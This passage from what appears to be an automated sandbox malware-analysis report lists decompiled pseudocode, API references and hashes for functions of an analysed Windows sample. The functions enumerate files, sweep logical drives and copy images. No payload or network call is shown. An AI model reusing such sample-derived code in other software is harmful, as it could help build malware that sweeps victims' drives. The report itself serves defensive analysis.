                                                                                                                          0x004051a3
                                                                                                                          0x004051a5
                                                                                                                          0x004051a5
                                                                                                                          0x004051ab
                                                                                                                          0x004051b2
                                                                                                                          0x004051b5
                                                                                                                          0x004051b8
                                                                                                                          0x004051c8
                                                                                                                          0x004051da

                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,004051DB,?,?,?,?,0040523E,00000000,00405291,?,?,00000000,00000000,00000000), ref: 0040513B
                                                                                                                          • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040519B
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,00000010), ref: 004051AB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3541575487-0
                                                                                                                          • Opcode ID: 524fcd590759a1fbd4d207714f0cb58143cf8f2903c84afd41d3760fe214a385
                                                                                                                          • Instruction ID: 84585f26add88bff0cc2ce1aee7b2e7e5f9eb71f6f66f1e556af33cdfbb1cecb
                                                                                                                          • Opcode Fuzzy Hash: 524fcd590759a1fbd4d207714f0cb58143cf8f2903c84afd41d3760fe214a385
                                                                                                                          • Instruction Fuzzy Hash: ED415070900508AFDB11EF95C885BDEBBB8EF89305F5044FAE404BB291D7389F459E59
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004056A7, Relevance: 4.6, APIs: 3, Instructions: 74fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 55%
                                                                                                                          			E004056A7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _t14;
				CHAR* _t20;
				void* _t21;
				int _t30;
				void* _t41;
				void* _t45;
				void* _t51;
				void* _t60;
				void* _t62;
				void* _t65;
				void* _t67;
				struct _WIN32_FIND_DATAA* _t68;

				_t64 = __esi;
				_t41 = __ebx;
				_t14 = __eax -  *__eax;
				asm("popad");
				_t68 = _t67 + 0xfffffec0;
				_push(0);
				_push(0);
				E00405300(__ecx, __ebx, _t14, _t68, __edi, __esi);
				_pop(_t45);
				E00403258( &(_t68->ftCreationTime), _t45,  *((intOrPtr*)(__ebx + 0x1c)));
				E004044A8();
				_t20 = _t45;
				_push(_t20);
				_t21 = FindFirstFileA(_t20, _t68); // executed
				_t62 = _t21;
				asm("pushfd");
				E00403094(_t68);
				asm("popfd");
				if(_t21 + 1 != 0) {
					do {
						if(E0040536C(_t41, _t41, _t68->dwFileAttributes,  &(_t68->cFileName[4]), _t62, _t64,  *((intOrPtr*)(_t65 + 8))) != 0) {
							asm("jecxz 0x16");
							 *((intOrPtr*)(_t41 + 0x24))(_t68, 1);
							asm("jecxz 0x22");
							asm("loop 0x31");
							_push(E00402448(0x140));
							E004045E8( *((intOrPtr*)(_t41 + 0x18)), _t35);
							_pop(_t60);
							_t51 = 0x140;
							E0040254C(_t68, _t51, _t60);
						}
						_t30 = FindNextFileA(_t62, _t68); // executed
					} while (_t30 != 0);
					FindClose(_t62); // executed
				}
				 *((intOrPtr*)(_t41 + 0x20)) = 0;
				return E00404520( *((intOrPtr*)(_t41 + 0x20)));
			}















                                                                                                                          0x004056a7
                                                                                                                          0x004056a7
                                                                                                                          0x004056a7
                                                                                                                          0x004056a9
                                                                                                                          0x004056aa
                                                                                                                          0x004056b2
                                                                                                                          0x004056b3
                                                                                                                          0x004056b7
                                                                                                                          0x004056c3
                                                                                                                          0x004056c5
                                                                                                                          0x004056ca
                                                                                                                          0x004056cf
                                                                                                                          0x004056d2
                                                                                                                          0x004056d5
                                                                                                                          0x004056da
                                                                                                                          0x004056df
                                                                                                                          0x004056e0
                                                                                                                          0x004056e5
                                                                                                                          0x004056e7
                                                                                                                          0x004056e9
                                                                                                                          0x004056fc
                                                                                                                          0x00405701
                                                                                                                          0x0040570f
                                                                                                                          0x00405713
                                                                                                                          0x00405715
                                                                                                                          0x00405722
                                                                                                                          0x00405727
                                                                                                                          0x0040572c
                                                                                                                          0x0040572d
                                                                                                                          0x00405730
                                                                                                                          0x00405730
                                                                                                                          0x00405737
                                                                                                                          0x0040573c
                                                                                                                          0x00405741
                                                                                                                          0x00405741
                                                                                                                          0x0040574e
                                                                                                                          0x00405759

                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA,00000000,0040758B), ref: 004056D5
                                                                                                                          • FindNextFileA.KERNEL32(00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA), ref: 00405737
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3541575487-0
                                                                                                                          • Opcode ID: 7e704a9b868fdf1e88b7c0ef0153828458dabf46e2b7cce886aa46cd4968a9f2
                                                                                                                          • Instruction ID: f2b03bfa0ad8d059d80b67f6c6517dce38b4ab09ecbfd790616c6b691a452e24
                                                                                                                          • Opcode Fuzzy Hash: 7e704a9b868fdf1e88b7c0ef0153828458dabf46e2b7cce886aa46cd4968a9f2
                                                                                                                          • Instruction Fuzzy Hash: 0E1181B53005006BD605BB269D8296B3759DBC5328B10843FBA04EB2C7DA3DCC029A99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406D40, Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 67%
                                                                                                                          			E00406D40(void* __eax, void* __ebx, void* __edi, void* __esi, char _a12245929) {
				char _v155;
				char _v160;
				signed int _t37;
				intOrPtr _t41;
				void* _t45;
				void* _t50;
				void* _t51;

				_t50 = _t51;
				_v160 = 0;
				_t45 = __eax;
				_push(_t50);
				_push(0x406dfc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xffffff64;
				GetLogicalDriveStringsA(0x97,  &_v155); // executed
				_t37 = 0;
				while(_a12245929 != 0) {
					_t48 = _t37 & 0x000000ff;
					if(GetDriveTypeA(_t50 + (_t37 & 0x000000ff) - 0x97) != 5 && E0040258C( *((intOrPtr*)(_t50 + _t48 - 0x97))) != 0x41 && E0040258C( *((intOrPtr*)(_t50 + _t48 - 0x97))) != 0x42) {
						E004031B4();
						E00403214(_t45, _v160);
					}
					_t37 = _t37 + 4;
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E00406E03);
				return E00403094( &_v160);
			}










                                                                                                                          0x00406d41
                                                                                                                          0x00406d4e
                                                                                                                          0x00406d54
                                                                                                                          0x00406d58
                                                                                                                          0x00406d59
                                                                                                                          0x00406d5e
                                                                                                                          0x00406d61
                                                                                                                          0x00406d70
                                                                                                                          0x00406d75
                                                                                                                          0x00406dd5
                                                                                                                          0x00406d7b
                                                                                                                          0x00406d91
                                                                                                                          0x00406dc0
                                                                                                                          0x00406dcd
                                                                                                                          0x00406dcd
                                                                                                                          0x00406dd2
                                                                                                                          0x00406dd2
                                                                                                                          0x00406de5
                                                                                                                          0x00406de8
                                                                                                                          0x00406deb
                                                                                                                          0x00406dfb

                                                                                                                          APIs
                                                                                                                          • GetLogicalDriveStringsA.KERNEL32 ref: 00406D70
                                                                                                                          • GetDriveTypeA.KERNEL32(00000000), ref: 00406D89
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Drive$LogicalStringsType
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1630765265-0
                                                                                                                          • Opcode ID: e173af02ca9d9f3ac33bd7cae86aa4c8f38faec1d5ba2bccd9283cb2c0ba3d05
                                                                                                                          • Instruction ID: e1e1b0806745e30ff5eb453561950d2c3ef676df74625b4c39c06a75345551cd
                                                                                                                          • Opcode Fuzzy Hash: e173af02ca9d9f3ac33bd7cae86aa4c8f38faec1d5ba2bccd9283cb2c0ba3d05
                                                                                                                          • Instruction Fuzzy Hash: 301159725181089EE720BE759C52BAA7FADDF45304F4644F7AA0DB32C3D9384D128A28
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404F6C, Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404F6C(CHAR* __eax) {
				intOrPtr _v288;
				void* _t3;
				void* _t4;
				struct _WIN32_FIND_DATAA* _t8;

				_t3 = FindFirstFileA(__eax, _t8); // executed
				_t4 = _t3 + 1;
				if(_t4 != 0) {
					FindClose(_t4 - 1); // executed
					return _v288;
				}
				return _t4;
			}







                                                                                                                          0x00404f74
                                                                                                                          0x00404f79
                                                                                                                          0x00404f7a
                                                                                                                          0x00404f7e
                                                                                                                          0x00000000
                                                                                                                          0x00404f83
                                                                                                                          0x00404f8d

                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(?,?,0040818B,00000000,00408220), ref: 00404F74
                                                                                                                          • FindClose.KERNEL32(00000000,?,?,0040818B,00000000,00408220), ref: 00404F7E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2295610775-0
                                                                                                                          • Opcode ID: 66901251027beccf77baa5ce98e67b536316a538da170c98b5b2277659282e4c
                                                                                                                          • Instruction ID: 35bd28bbec0286cbaf15e580cccf41787655d5f9f594f83c1a320a5651e29ebc
                                                                                                                          • Opcode Fuzzy Hash: 66901251027beccf77baa5ce98e67b536316a538da170c98b5b2277659282e4c
                                                                                                                          • Instruction Fuzzy Hash: B8C08CE480010023C80033AA8C06A27204CBAC0358F88092A7BA8F72C3C93E891040AE
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406638, Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 409COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			E00406638(void** __eax, intOrPtr __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v14;
				char _v17;
				signed int _v18;
				char _v19;
				int _v20;
				void** _v24;
				unsigned int _v28;
				intOrPtr _v32;
				char _v33;
				int _v40;
				intOrPtr _v44;
				void* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed short _v58;
				short _v60;
				short _v62;
				intOrPtr _v68;
				void* _v72;
				void** _v76;
				void** _v80;
				intOrPtr _v100;
				signed short _v106;
				short _v108;
				int _v112;
				int _v116;
				char _v120;
				short _v126;
				intOrPtr _v128;
				int _v136;
				int _v140;
				void _v144;
				void* __ebp;
				signed int _t138;
				signed int _t139;
				void* _t141;
				unsigned int _t152;
				void* _t154;
				void* _t162;
				void* _t179;
				void* _t181;
				void* _t199;
				void* _t201;
				void* _t207;
				void* _t212;
				void* _t214;
				signed int _t220;
				void* _t221;
				void* _t229;
				void* _t232;
				void* _t243;
				void* _t255;
				intOrPtr _t264;
				void* _t274;
				void* _t275;
				int _t293;
				int _t294;
				intOrPtr _t318;
				void* _t324;
				void* _t366;
				void* _t369;
				int _t375;
				int _t376;
				void* _t378;
				void* _t380;
				intOrPtr _t381;

				_t378 = _t380;
				_t381 = _t380 + 0xffffff74;
				_v32 = __ecx;
				_v28 = __edx;
				_v24 = __eax;
				_v33 = 0;
				_v62 = 0;
				_v60 = 1;
				_t138 = _v28 + 1;
				_t139 = _t138 >> 1;
				if(_t138 < 0) {
					asm("adc eax, 0x0");
				}
				_v58 = _t139;
				_t141 = E0040598C(_v32);
				_t384 = _t141 - 6;
				if(_t141 != 6) {
					L59:
					return _v33;
				} else {
					_v44 = ((_v58 & 0x0000ffff) << 4) + 6;
					_v68 = E0040456C();
					_v52 = E00405FD8(0, 0, _t384);
					_v56 = E00405FD8(0, 0, _t384);
					_push(_t378);
					_push(0x406b11);
					_push( *[fs:ecx]);
					 *[fs:ecx] = _t381;
					_t152 = _v28 >> 1;
					if(_t152 < 0) {
						L22:
						_t154 = _v28 >> 1;
						__eflags = _t154;
						if(_t154 < 0) {
							L57:
							__eflags = 0;
							_pop(_t318);
							 *[fs:eax] = _t318;
							_push(E00406B18);
							E00404520(_v68);
							E00404520(_v52);
							return E00404520(_v56);
						} else {
							_t162 = _t154 + 1;
							__eflags = _t162;
							_v72 = _t162;
							_v40 = 0;
							_v80 = _v24;
							do {
								_t366 =  *_v80;
								_v48 = _v80[1];
								__eflags = _t366;
								if(_t366 != 0) {
									L26:
									GetObjectA(_v48, 0x18,  &_v144);
									_t293 = _v140;
									_t375 = _v136;
									E00402660( &_v120, 0x28);
									_v120 = 0x28;
									_v116 = _t293;
									_v112 = _t375;
									__eflags = _t366;
									if(_t366 != 0) {
										_t243 = _t293 + _t293;
										__eflags = _t243;
										_v112 = _t243;
									}
									_v108 = 1;
									_v18 = E0040465C(_v68, _v40);
									__eflags = _v14;
									if(_v14 == 0) {
										_v14 = E00406580(_v18 & 0x0000ffff);
									}
									_v106 = _v14;
									_push(E004065CC(_t293, _t375, _t378) + 0x28);
									_t179 = E00406624(_t293, _t375);
									_pop(_t324);
									_v100 = _t324 + _t179;
									_t181 = E0040598C(_v32);
									__eflags = _t181 - 0x28;
									if(_t181 == 0x28) {
										__eflags = _t366;
										if(__eflags == 0) {
											E004061E0(_v52, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
											E00406218(_v52, 0x28, 1, _t378, __eflags);
										} else {
											E004061E0(_v52, CopyImage(_t366, 0, _t293, _t375, 0), __eflags);
											_t220 = _v106 & 0x0000ffff;
											__eflags = _t220 - 0x10;
											if(__eflags > 0) {
												_t221 = _t220 - 0x18;
												__eflags = _t221;
												if(__eflags == 0) {
													E00406218(_v52, 0x28, 6, _t378, __eflags);
												} else {
													__eflags = _t221 - 8;
													if(__eflags == 0) {
														E00406218(_v52, 0x28, 7, _t378, __eflags);
													}
												}
											} else {
												if(__eflags == 0) {
													E00406218(_v52, 0x28, 5, _t378, __eflags);
												} else {
													_t229 = _t220 - 1;
													__eflags = _t229;
													if(__eflags == 0) {
														E00406218(_v52, 0x28, 1, _t378, __eflags);
													} else {
														_t232 = _t229 - 3;
														__eflags = _t232;
														if(__eflags == 0) {
															E00406218(_v52, 0x28, 2, _t378, __eflags);
														} else {
															__eflags = _t232 - 4;
															if(__eflags == 0) {
																E00406218(_v52, 0x28, 3, _t378, __eflags);
															}
														}
													}
												}
											}
										}
										__eflags =  *(_v52 + 0x41);
										if(__eflags == 0) {
											L54:
											E004061E0(_v56, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
											E00406218(_v56, 0x28, 1, _t378, __eflags);
											E00406624(_t293, _t375);
											_t199 = E0040598C(_v32);
											_t201 = E00406624(_t293, _t375);
											__eflags = _t199 - _t201;
											if(_t199 == _t201) {
												goto L56;
											} else {
												E00402BEC();
												goto L59;
											}
										} else {
											_t207 = E0040598C(_v32);
											__eflags = _t207 - (_v18 & 0x0000ffff) << 2;
											if(_t207 == (_v18 & 0x0000ffff) << 2) {
												E004065CC(_t293, _t375, _t378);
												_t212 = E0040598C(_v32);
												_t214 = E004065CC(_t293, _t375, _t378);
												_pop(0x28);
												__eflags = _t212 - _t214;
												if(__eflags == 0) {
													goto L54;
												} else {
													E00402BEC();
													goto L59;
												}
											} else {
												E00402BEC();
												goto L59;
											}
										}
									} else {
										E00402BEC();
										goto L59;
									}
								} else {
									__eflags = _v48;
									if(_v48 == 0) {
										goto L57;
									} else {
										goto L26;
									}
								}
								goto L60;
								L56:
								_v40 = _v40 + 1;
								_v80 =  &(_v80[2]);
								_t130 =  &_v72;
								 *_t130 = _v72 - 1;
								__eflags =  *_t130;
							} while ( *_t130 != 0);
							goto L57;
						}
					} else {
						_v72 = _t152 + 1;
						_v76 = _v24;
						while(1) {
							_t369 =  *_v76;
							_v48 = _v76[1];
							if(_t369 == 0 && _v48 == 0) {
								goto L22;
							}
							GetObjectA(_v48, 0x18,  &_v144);
							_t294 = _v140;
							_t376 = _v136;
							if(_t369 != 0) {
								GetObjectA(_t369, 0x18,  &_v144);
							}
							E00402660( &_v20, 0x10);
							_v20 = _t294;
							_v19 = _t376;
							if(_t369 != 0) {
								_t255 = CopyImage(_t369, 0, _t294, _t376, 0x2000); // executed
								E004061E0(_v52, _t255, __eflags);
								E00402660( &_v120, 0x28);
								_v120 = 0x28;
								GetObjectA(E00406154(_v52, __eflags), 0x18,  &_v144);
								_t264 = _v128;
								__eflags = _t264 - 1;
								if(_t264 != 1) {
									L14:
									_t310 = _v126;
									__eflags = 1 - 0x10;
									if(1 >= 0x10) {
										__eflags = 1 - 0x100;
										if(1 >= 0x100) {
											E00406218(_v52, _t310, 3, _t378, 1 - 0x100);
											_v18 = 0;
											_v17 = 1;
										} else {
											E00406218(_v52, _t310, 2, _t378, 1 - 0x100);
											_v18 = 0x10;
										}
									} else {
										E00406218(_v52, _t310, 1, _t378, 1 - 0x10);
										_v18 = 2;
									}
								} else {
									__eflags = _v126 - 0xf;
									if(_v126 < 0xf) {
										goto L14;
									} else {
										_v18 = 0;
										_v17 = 0;
										_v14 = _v126;
									}
								}
							} else {
								_v18 = 2;
							}
							E004045E8(_v68, 0xbadbad);
							_t274 = E004065CC(_t294, _t376, _t378);
							_t275 = E00406598(_t378);
							_v12 = _t274 + _t275 + 0x28 + E00406624(_t294, _t376);
							_v8 = _v44;
							if(E0040598C(_v32) == 0x10) {
								_v44 = _v44 + _v12;
								_v76 =  &(_v76[2]);
								_t66 =  &_v72;
								 *_t66 = _v72 - 1;
								__eflags =  *_t66;
								if( *_t66 != 0) {
									continue;
								} else {
									goto L22;
								}
							} else {
								E00402BEC();
								goto L59;
							}
							goto L60;
						}
						goto L22;
					}
				}
				L60:
			}







































































                                                                                                                          0x00406639
                                                                                                                          0x0040663b
                                                                                                                          0x00406644
                                                                                                                          0x00406647
                                                                                                                          0x0040664a
                                                                                                                          0x0040664d
                                                                                                                          0x00406651
                                                                                                                          0x00406657
                                                                                                                          0x00406660
                                                                                                                          0x00406661
                                                                                                                          0x00406663
                                                                                                                          0x00406665
                                                                                                                          0x00406665
                                                                                                                          0x00406668
                                                                                                                          0x00406677
                                                                                                                          0x0040667c
                                                                                                                          0x0040667f
                                                                                                                          0x00406b1c
                                                                                                                          0x00406b25
                                                                                                                          0x00406685
                                                                                                                          0x0040668f
                                                                                                                          0x00406697
                                                                                                                          0x004066a3
                                                                                                                          0x004066af
                                                                                                                          0x004066b4
                                                                                                                          0x004066b5
                                                                                                                          0x004066ba
                                                                                                                          0x004066bd
                                                                                                                          0x004066c3
                                                                                                                          0x004066c7
                                                                                                                          0x00406877
                                                                                                                          0x0040687a
                                                                                                                          0x0040687c
                                                                                                                          0x0040687e
                                                                                                                          0x00406aeb
                                                                                                                          0x00406aeb
                                                                                                                          0x00406aed
                                                                                                                          0x00406af0
                                                                                                                          0x00406af3
                                                                                                                          0x00406afb
                                                                                                                          0x00406b03
                                                                                                                          0x00406b10
                                                                                                                          0x00406884
                                                                                                                          0x00406884
                                                                                                                          0x00406884
                                                                                                                          0x00406885
                                                                                                                          0x00406888
                                                                                                                          0x00406892
                                                                                                                          0x00406895
                                                                                                                          0x00406898
                                                                                                                          0x004068a0
                                                                                                                          0x004068a3
                                                                                                                          0x004068a5
                                                                                                                          0x004068b1
                                                                                                                          0x004068be
                                                                                                                          0x004068c3
                                                                                                                          0x004068c9
                                                                                                                          0x004068d9
                                                                                                                          0x004068de
                                                                                                                          0x004068e5
                                                                                                                          0x004068e8
                                                                                                                          0x004068eb
                                                                                                                          0x004068ed
                                                                                                                          0x004068f1
                                                                                                                          0x004068f1
                                                                                                                          0x004068f3
                                                                                                                          0x004068f3
                                                                                                                          0x004068f6
                                                                                                                          0x0040690a
                                                                                                                          0x0040690d
                                                                                                                          0x00406912
                                                                                                                          0x0040691f
                                                                                                                          0x0040691f
                                                                                                                          0x00406927
                                                                                                                          0x00406939
                                                                                                                          0x0040693e
                                                                                                                          0x00406943
                                                                                                                          0x00406946
                                                                                                                          0x00406954
                                                                                                                          0x00406959
                                                                                                                          0x0040695c
                                                                                                                          0x00406968
                                                                                                                          0x0040696a
                                                                                                                          0x00406a08
                                                                                                                          0x00406a12
                                                                                                                          0x00406970
                                                                                                                          0x00406981
                                                                                                                          0x00406986
                                                                                                                          0x0040698a
                                                                                                                          0x0040698d
                                                                                                                          0x004069a0
                                                                                                                          0x004069a0
                                                                                                                          0x004069a3
                                                                                                                          0x004069e1
                                                                                                                          0x004069a5
                                                                                                                          0x004069a5
                                                                                                                          0x004069a8
                                                                                                                          0x004069ed
                                                                                                                          0x004069ed
                                                                                                                          0x004069a8
                                                                                                                          0x0040698f
                                                                                                                          0x0040698f
                                                                                                                          0x004069d5
                                                                                                                          0x00406991
                                                                                                                          0x00406991
                                                                                                                          0x00406991
                                                                                                                          0x00406992
                                                                                                                          0x004069b1
                                                                                                                          0x00406994
                                                                                                                          0x00406994
                                                                                                                          0x00406994
                                                                                                                          0x00406997
                                                                                                                          0x004069bd
                                                                                                                          0x00406999
                                                                                                                          0x00406999
                                                                                                                          0x0040699c
                                                                                                                          0x004069c9
                                                                                                                          0x004069c9
                                                                                                                          0x0040699c
                                                                                                                          0x00406997
                                                                                                                          0x00406992
                                                                                                                          0x0040698f
                                                                                                                          0x0040698d
                                                                                                                          0x00406a1a
                                                                                                                          0x00406a1e
                                                                                                                          0x00406a89
                                                                                                                          0x00406a9d
                                                                                                                          0x00406aa7
                                                                                                                          0x00406ab0
                                                                                                                          0x00406ac0
                                                                                                                          0x00406acb
                                                                                                                          0x00406ad0
                                                                                                                          0x00406ad2
                                                                                                                          0x00000000
                                                                                                                          0x00406ad4
                                                                                                                          0x00406ad4
                                                                                                                          0x00000000
                                                                                                                          0x00406ad4
                                                                                                                          0x00406a20
                                                                                                                          0x00406a37
                                                                                                                          0x00406a45
                                                                                                                          0x00406a47
                                                                                                                          0x00406a58
                                                                                                                          0x00406a69
                                                                                                                          0x00406a75
                                                                                                                          0x00406a7a
                                                                                                                          0x00406a7b
                                                                                                                          0x00406a7d
                                                                                                                          0x00000000
                                                                                                                          0x00406a7f
                                                                                                                          0x00406a7f
                                                                                                                          0x00000000
                                                                                                                          0x00406a7f
                                                                                                                          0x00406a49
                                                                                                                          0x00406a49
                                                                                                                          0x00000000
                                                                                                                          0x00406a49
                                                                                                                          0x00406a47
                                                                                                                          0x0040695e
                                                                                                                          0x0040695e
                                                                                                                          0x00000000
                                                                                                                          0x0040695e
                                                                                                                          0x004068a7
                                                                                                                          0x004068a7
                                                                                                                          0x004068ab
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004068ab
                                                                                                                          0x00000000
                                                                                                                          0x00406adb
                                                                                                                          0x00406adb
                                                                                                                          0x00406ade
                                                                                                                          0x00406ae2
                                                                                                                          0x00406ae2
                                                                                                                          0x00406ae2
                                                                                                                          0x00406ae2
                                                                                                                          0x00000000
                                                                                                                          0x00406895
                                                                                                                          0x004066cd
                                                                                                                          0x004066ce
                                                                                                                          0x004066d4
                                                                                                                          0x004066d7
                                                                                                                          0x004066da
                                                                                                                          0x004066e2
                                                                                                                          0x004066e7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406700
                                                                                                                          0x00406705
                                                                                                                          0x0040670b
                                                                                                                          0x00406713
                                                                                                                          0x0040671f
                                                                                                                          0x0040671f
                                                                                                                          0x0040672e
                                                                                                                          0x00406733
                                                                                                                          0x00406738
                                                                                                                          0x0040673d
                                                                                                                          0x00406752
                                                                                                                          0x0040675c
                                                                                                                          0x0040676b
                                                                                                                          0x00406770
                                                                                                                          0x00406789
                                                                                                                          0x0040678e
                                                                                                                          0x00406792
                                                                                                                          0x00406796
                                                                                                                          0x004067b1
                                                                                                                          0x004067b1
                                                                                                                          0x004067c2
                                                                                                                          0x004067c5
                                                                                                                          0x004067d7
                                                                                                                          0x004067dd
                                                                                                                          0x004067f4
                                                                                                                          0x004067f9
                                                                                                                          0x004067fd
                                                                                                                          0x004067df
                                                                                                                          0x004067e4
                                                                                                                          0x004067e9
                                                                                                                          0x004067e9
                                                                                                                          0x004067c7
                                                                                                                          0x004067cc
                                                                                                                          0x004067d1
                                                                                                                          0x004067d1
                                                                                                                          0x00406798
                                                                                                                          0x00406798
                                                                                                                          0x0040679d
                                                                                                                          0x00000000
                                                                                                                          0x0040679f
                                                                                                                          0x0040679f
                                                                                                                          0x004067a3
                                                                                                                          0x004067ab
                                                                                                                          0x004067ab
                                                                                                                          0x0040679d
                                                                                                                          0x0040673f
                                                                                                                          0x0040673f
                                                                                                                          0x0040673f
                                                                                                                          0x00406813
                                                                                                                          0x0040681d
                                                                                                                          0x00406826
                                                                                                                          0x0040683c
                                                                                                                          0x00406842
                                                                                                                          0x00406858
                                                                                                                          0x00406867
                                                                                                                          0x0040686a
                                                                                                                          0x0040686e
                                                                                                                          0x0040686e
                                                                                                                          0x0040686e
                                                                                                                          0x00406871
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040685a
                                                                                                                          0x0040685a
                                                                                                                          0x00000000
                                                                                                                          0x0040685a
                                                                                                                          0x00000000
                                                                                                                          0x00406858
                                                                                                                          0x00000000
                                                                                                                          0x004066d7
                                                                                                                          0x004066c7
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00406700
                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 0040671F
                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00406789
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 004068BE
                                                                                                                          • CopyImage.USER32 ref: 00406977
                                                                                                                          • CopyImage.USER32 ref: 004069FE
                                                                                                                          • CopyImage.USER32 ref: 00406752
                                                                                                                            • Part of subcall function 004061E0: GetObjectA.GDI32(00000000,00000018), ref: 004061F2
                                                                                                                            • Part of subcall function 00406154: 73BBAC50.USER32(00000000,?,?,00000000,004063DF,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00406177
                                                                                                                            • Part of subcall function 00406154: 73BBA7A0.GDI32(00000000,?,00000000,00000041,00000000,00000000,00000000,?,?,00000000,004063DF,00000000,?,00000000,?,00000000), ref: 00406192
                                                                                                                            • Part of subcall function 00406154: 73BBB380.USER32(00000000,00000000,00000000,?,00000000,00000041,00000000,00000000,00000000,?,?,00000000,004063DF,00000000,?,00000000), ref: 0040619D
                                                                                                                          • CopyImage.USER32 ref: 00406A93
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CopyImage$B380
                                                                                                                          • String ID: (
                                                                                                                          • API String ID: 1117845954-3887548279
                                                                                                                          • Opcode ID: d876f8923c35b832f472c7a332169e1393348db5e915f3cd377978d8d2a1e04c
                                                                                                                          • Instruction ID: 8b23a46e2d3205504fa6020bfc4f244d26e515b74d7163ba5290a0ebff7405a2
                                                                                                                          • Opcode Fuzzy Hash: d876f8923c35b832f472c7a332169e1393348db5e915f3cd377978d8d2a1e04c
